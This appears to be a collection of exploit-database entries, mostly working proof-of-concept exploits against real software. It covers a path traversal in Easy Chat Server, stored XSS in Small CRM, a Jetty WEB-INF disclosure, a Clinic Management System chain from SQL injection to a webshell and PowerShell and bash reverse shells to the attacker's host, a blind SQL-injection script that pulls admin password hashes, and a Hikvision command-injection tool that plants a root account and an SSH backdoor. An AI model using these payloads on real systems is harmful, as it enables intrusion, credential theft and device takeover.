# Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read # Date: 11 October 2021 # Exploit Author: z4nd3r # Vendor Homepage: http://www.echatserver.com/ # Software Link: http://www.echatserver.com/ # Version: 3.1 # Tested on: Windows 10 Pro Build 19042, English # # Description: # The web server allows for directory traversal and reading of arbitrary files on the # system, given that the account running the server can access the target file. Proof-of-concept using Burp: Request: GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 192.168.50.52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ---------------------------------------- Response: HTTP/1.0 200 OK Date: Thu, 21 Oct 2021 14:55:57 GMT Server: Easy Chat Server/1.0 Accept-Ranges: bytes Content-Length: 92 Connection: close Content-Type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

# Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS) # Date: 20/10/2021 # Exploit Author: Ghuliev # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/small-crm-php/ # Version: 3.0 # Tested on: Server: Ubuntu When a user or admin creates a ticket, we can inject javascript code into ticket. POST /crm/create-ticket.php HTTP/1.1 Host: IP Content-Length: 79 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://IP/crm/create-ticket.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7 subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send

# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure # Date: 2021-10-21 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.eclipse.org/jetty/ # Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ # Version: 9.4.37.v20210219 and 9.4.38.v20210224 # Tested on: Kali Linux # CVE : CVE-2021-28164 POC #1 - web.xml GET /%2e/WEB-INF/web.xml HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution # Date:21/10/2021 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: 1.0 # Tested on: Windows 7 and Ubuntu 21.10 # References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e # Vulnerability: Through SQL injection to bypass the login form it is # possible to upload a malicious file and after use that malicious file to # execute code in the remote system. # Proof of Concept: import requests import sys import time session = requests.Session() #http_proxy = "http://127.0.0.1:8080" #https_proxy = "https://127.0.0.1:8080" #proxyDict = {"http" : http_proxy, # "https" : https_proxy} def windows(HPW,host,shell_name): payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def linux(HPL,host,shell_name): payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"' host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def main(): host = sys.argv[1] shell_name = sys.argv[2] url = host + '/login.php' values = {'user': "admin", 'email': "' OR 1 -- -", 'password': '', 'btn_login': "" } r = session.post(url, data=values) cookie = session.cookies.get_dict()['PHPSESSID'] data = { 'btn_web':''} headers= {'Cookie': 'PHPSESSID='+cookie} request = session.post(host+ '/manage_website.php', data=data, headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")}) print("") print('[*] Your Simple Webshell was uploaded to ' + host + '/uploadImage/Logo/' + shell_name + '.php' ) print("") LHOST = input('[+] Enter your LHOST: ') LPORT = input('[+] Enter your LPORT: ') print("") HPW= "'"+LHOST+"'"+','+LPORT HPL= ""+LHOST+""+'/'+LPORT print('[+] Option 1: Windows') print('[+] Option 2: Linux') option = input('[+] Choose OS: ') if option == "1": windows(HPW,host,shell_name) exit() elif option == "2": linux(HPL,host,shell_name) exit() else: print("Please choose Windows or Linux") main() #Usage: python3 host shell_name #Example: python3 http://localhost/clinic shell

# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) # Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec) # Date: 2021-10-21 # Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip # Version: 1.0 # Tested On: Windows 10 + XAMPP + Python 3 # Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers # with access to the username and md5 hash of any administrators. # Vulnerable file: /online-course-registration/Online/pincode-verification.php # Proof of Concept: #!/usr/bin/python3 import requests import sys import string def exploit(hostname, username, password): # Building bruteforce list pass_list = list(string.ascii_lowercase) pass_list += list(range(0,10)) pass_list = map(str, pass_list) pass_list = list(pass_list) user_list = pass_list user_list += list(string.ascii_uppercase) user_list = map(str, user_list) user_list = list(user_list) session = requests.Session() # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/index.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"regno": f"{username}", "password": f"{password}", "submit": ''} r = session.post(url, headers=headers, data=data) print("Admin username:") # This range number is pretty arbitrary, so change it to whatever you feel like for i in range(1,33): counter = 0 find = False for j in user_list: # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(user_list): find = True break if find: break print("\n") print("Admin password hash:") # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed for i in range(1,33): counter = 0 find = False for j in pass_list: url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(pass_list): find = True break if find: break print("\n\nSuccessfully pwnd :)") def logo(): art = R''' __/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__ _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__ _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__ _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__ _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__ _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__ _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__ _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_ _\///______________\///////////__\///_____\/////__________\///////\//__ ''' info = 'CVE-2021-37357 PoC'.center(76) credits = 'Created by @AffineSecurity and @qhum7sec'.center(76) print(f"{art}\n{info}\n{credits}") def main(): logo() hostname = sys.argv[1] username = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 4: print("Usage: python3 exploit.py http://127.0.0.1:80 username password") exploit(hostname, username, password) if __name__ == '__main__': main()

# Exploit Title: Hikvision Web Server Build 210702 - Command Injection # Exploit Author: bashis # Vendor Homepage: https://www.hikvision.com/ # Version: 1.0 # CVE: CVE-2021-36260 # Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html # All credit to Watchful_IP #!/usr/bin/env python3 """ Note: 1) This code will _not_ verify if remote is Hikvision device or not. 2) Most of my interest in this code has been concentrated on how to reliably detect vulnerable and/or exploitable devices. Some devices are easy to detect, verify and exploit the vulnerability, other devices may be vulnerable but not so easy to verify and exploit. I think the combined verification code should have very high accuracy. 3) 'safe check' (--check) will try write and read for verification 'unsafe check' (--reboot) will try reboot the device for verification [Examples] Safe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check Safe and unsafe vulnerability/verify check: (will only use 'unsafe check' if not verified with 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot Unsafe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot Launch and connect to SSH shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell Execute command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l" Execute blind command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot" $./CVE-2021-36260.py -h [*] Hikvision CVE-2021-36260 [*] PoC by bashis <mcw noemail eu> (2021) usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check] [--reboot] [--shell] [--cmd CMD] [--cmd_blind CMD_BLIND] [--noverify] [--proto {http,https}] optional arguments: -h, --help show this help message and exit --rhost RHOST Remote Target Address (IP/FQDN) --rport RPORT Remote Target Port --check Check if vulnerable --reboot Reboot if vulnerable --shell Launch SSH shell --cmd CMD execute cmd (i.e: "ls -l") --cmd_blind CMD_BLIND execute blind cmd (i.e: "reboot") --noverify Do not verify if vulnerable --proto {http,https} Protocol used $ """ import os import argparse import time import requests from requests import packages from requests.packages import urllib3 from requests.packages.urllib3 import exceptions class Http(object): def __init__(self, rhost, rport, proto, timeout=60): super(Http, self).__init__() self.rhost = rhost self.rport = rport self.proto = proto self.timeout = timeout self.remote = None self.uri = None """ Most devices will use self-signed certificates, suppress any warnings """ requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) self.remote = requests.Session() self._init_uri() self.remote.headers.update({ 'Host': f'{self.rhost}:{self.rport}', 'Accept': '*/*', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8', }) """ self.remote.proxies.update({ # 'http': 'http://127.0.0.1:8080', }) """ def send(self, url=None, query_args=None, timeout=5): if query_args: """Some devices can handle more, others less, 22 bytes seems like a good compromise""" if len(query_args) > 22: print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})') return None """This weird code will try automatically switch between http/https and update Host """ try: if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) except requests.exceptions.ConnectionError: self.proto = 'https' if self.proto == 'http' else 'https' self._init_uri() try: if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) except requests.exceptions.ConnectionError: return None except requests.exceptions.RequestException: return None except KeyboardInterrupt: return None """302 when requesting http on https enabled device""" if data.status_code == 302: redirect = data.headers.get('Location') self.uri = redirect[:redirect.rfind('/')] self._update_host() if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) return data def _update_host(self): if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]: self.remote.headers.update({ 'Host': self.uri[self.uri.rfind('://') + 3:], }) def _init_uri(self): self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport)) def put(self, url, query_args, timeout): """Command injection in the <language> tag""" query_args = '<?xml version="1.0" encoding="UTF-8"?>' \ f'<language>$({query_args})</language>' return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout) def get(self, url, timeout): return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout) def check(remote, args): """ status_code == 200 (OK); Verified vulnerable and exploitable status_code == 500 (Internal Server Error); Device may be vulnerable, but most likely not The SDK webLanguage tag is there, but generate status_code 500 when language not found I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500) (Issue: Could also be other directory than 'webLib', r/o FS etc...) status_code == 401 (Unauthorized); Defiantly not vulnerable """ if args.noverify: print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"') return True print(f'[*] Checking remote "{args.rhost}:{args.rport}"') data = remote.send(url='/', query_args=None) if data is None: print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"') return None print('[i] ETag:', data.headers.get('ETag')) data = remote.send(query_args='>webLib/c') if data is None or data.status_code == 404: print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision') return False status_code = data.status_code data = remote.send(url='/c', query_args=None) if not data.status_code == 200: """We could not verify command injection""" if status_code == 500: print(f'[-] Could not verify if vulnerable (Code: {status_code})') if args.reboot: return check_reboot(remote, args) else: print(f'[+] Remote is not vulnerable (Code: {status_code})') return False print('[!] Remote is verified exploitable') return True def check_reboot(remote, args): """ We sending 'reboot', wait 2 sec, then checking with GET request. - if there is data returned, we can assume remote is not vulnerable. - If there is no connection or data returned, we can assume remote is vulnerable. """ if args.check: print('[i] Checking if vulnerable with "reboot"') else: print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"') remote.send(query_args='reboot') time.sleep(2) if not remote.send(url='/', query_args=None): print('[!] Remote is vulnerable') return True else: print('[+] Remote is not vulnerable') return False def cmd(remote, args): if not check(remote, args): return False data = remote.send(query_args=f'{args.cmd}>webLib/x') if data is None: return False data = remote.send(url='/x', query_args=None) if data is None or not data.status_code == 200: print(f'[!] Error execute cmd "{args.cmd}"') return False print(data.text) return True def cmd_blind(remote, args): """ Blind command injection """ if not check(remote, args): return False data = remote.send(query_args=f'{args.cmd_blind}') if data is None or not data.status_code == 500: print(f'[-] Error execute cmd "{args.cmd_blind}"') return False print(f'[i] Try execute blind cmd "{args.cmd_blind}"') return True def shell(remote, args): if not check(remote, args): return False data = remote.send(url='/N', query_args=None) if data.status_code == 404: print(f'[i] Remote "{args.rhost}" not pwned, pwning now!') data = remote.send(query_args='echo -n P::0:0:W>N') if data.status_code == 401: print(data.headers) print(data.text) return False remote.send(query_args='echo :/:/bin/sh>>N') remote.send(query_args='cat N>>/etc/passwd') remote.send(query_args='dropbear -R -B -p 1337') remote.send(query_args='cat N>webLib/N') else: print(f'[i] Remote "{args.rhost}" already pwned') print(f'[*] Trying SSH to {args.rhost} on port 1337') os.system(f'stty echo; stty iexten; stty icanon; \ ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \ P@{args.rhost} -p 1337') def main(): print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)') parser = argparse.ArgumentParser() parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)') parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port') parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable') parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable') parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell') parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")') parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")') parser.add_argument( '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable' ) parser.add_argument( '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used' ) args = parser.parse_args() remote = Http(args.rhost, args.rport, args.proto) try: if args.shell: shell(remote, args) elif args.cmd: cmd(remote, args) elif args.cmd_blind: cmd_blind(remote, args) elif args.check: check(remote, args) elif args.reboot: check_reboot(remote, args) else: parser.parse_args(['-h']) except KeyboardInterrupt: return False if __name__ == '__main__': main()